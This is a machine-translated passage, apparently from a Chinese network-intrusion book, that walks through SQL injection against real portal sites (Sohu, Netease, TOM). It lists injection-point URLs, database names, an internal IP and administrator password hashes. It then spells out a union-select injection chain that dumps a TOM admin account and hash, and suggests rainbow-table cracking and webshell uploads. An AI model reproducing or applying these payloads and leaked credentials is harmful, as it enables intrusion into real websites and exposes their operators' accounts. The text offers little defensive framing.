SQL Injection Vulnerability Detection for Sohu, Netease, and TOM Portals

Source: Internet
Author: User

From: <large and medium-sized network intrusion cases direct attack and defense> E-Industry Press authorizes the red and black Union www.2cto.com to publish

The User Name of the current database is admin, the database server address is 10.10.82.159, the database version is Mysql 5.0.27, and the current database name is sohush.

We further detected several important databases, including dvbbs and love008. The former is the forum database, and the latter is the 2008 topic database. In the Forum database, you can guess the Administrator account and password: jim, 4591b ****** ee2b5. In the love008 database, the two administrator users and passwords are obtained respectively (Figure 2 ):

Admin 21232f297a ***** 743894a0e4a801fc3

Es 3e4a632cb ***** 8fc21_fa5f8e4bd76

Figure 2 guess the Administrator account and password

Although the Administrator passwords are all encrypted by MD5, there are 20 Gbit/s of rainbow table downloads on the Internet. It is not difficult to crack the MD5 values of these common passwords. Through Background login, attackers can find ways to upload webshells and perform Elevation of Privilege and further penetration intrusion operations.

In addition, there are many SQL injection points on the Sohu website, for example:

Injection Point 1 (Figure 3): http://card.money. ***. com/yh/card_product.php? Id = 71

Injection Point 2: http://blog.club. ***. com/list_diary_detail.php? Artid = 43761 & db = blog002P4 & kindid = 3403

Injection Point 3: http://blog.club. ***. com/list_diary.php? Db = blog001P3 & kindid = 529

Injection Point 4: http: // mini *** .163.com/2009/0909/wuliangye/article.php? Id = 13

Injection Point 5: http://blog.club. ***. com/list_diary.php? Db = blog001P3 & kindid = 529

Injection Point 6: http://people.business. ***. com/person/plist. php? Userid = 2047

Injection Point 7: http://minisite.it. ***. com/minisite/site849/photodetail1.jsp? CorpID = 849 & status = browse & privCode = 04 & pictureID = 57275

Injection point 8: http://zj.svip. ****. com/news/2010/duanxindasai/item_list.php? Category_id = 1905

Figure 3 Sohu injection point query database information

2. MySQL injection test TOM portal website

TOM is also a major portal website in China. Many serious SQL injection vulnerabilities have been found during the detection of TOM portal websites, which are extremely harmful, attackers can log on to the background to upload Trojans to obtain webshells and further control the entire website server!

The TOM website's injection point address is:

Http: // qd ** .tom.com/blog_content.php? Blogid = 482

When Order by is directly used for query, an error will occur and the page will jump to the website homepage. You can use the -- terminator to partition and perform the following query:

Http: // qd ** .tom.com/blog_content.php? Blogid = 482 order by 14 --

Return to the normal page. The number of fields is 14. Execute the following query (figure 4 ):

Http: // qd ** .tom.com/blog_content.php? Blogid = 482 and 1 = 2 union select 1, 2, 3, group_concat (user (), 0x7C7C, version (), 0x7C7C, database, 12,13, 14% 20 --

Figure 4 union query for database information

Obtain the current database version, database name, and user. Then, all the table names in the current database are displayed, and the following query is submitted:

Http: // qd ** .tom.com/blog_content.php? Blogid = 482 and 1 = 2 union select 1, 2, 3, 4, group_concat (table_name), 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 from information_schema.tables where table_schema = database ()--

Figure 5 query all table names

In the returned information, you can obtain the names of all tables (figure 5 ). The table named adminuser may contain the Administrator account and password. to query the column name in the table, submit the following query:

Http: // qd ** .tom.com/blog_content.php? Blogid = 482 and 1 = 2 union select 1, 2, 3, 4, group_concat (column_name), 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 from information_schema.columns where table_name = (partition )--

Figure 6 username and password columns returned

The username and password columns are username and pw (figure 6 ). To display the data value of the user name and password, submit the following query statement:

Http: // qd ** .tom.com/blog_content.php? Blogid = 482 and 1 = 2 union select 1, 2, 3, 4, group_concat (username, 0x7C, pw), 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 from adminuser --

Figure 7 obtain Administrator account password information

From the returned page information, you can see that the administrator username is qdjxlq and the password is 3631137b9b0e47608c4ece9decc9a607 (figure 7 ). The password is an MD5-encrypted 32 ciphertext, which is not very difficult to crack. After obtaining the password of the background Administrator Account, find the background login address and obtain the background login link address (figure 8 ):

Http: // qd ** .tom.com/admin/admin_login.php

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.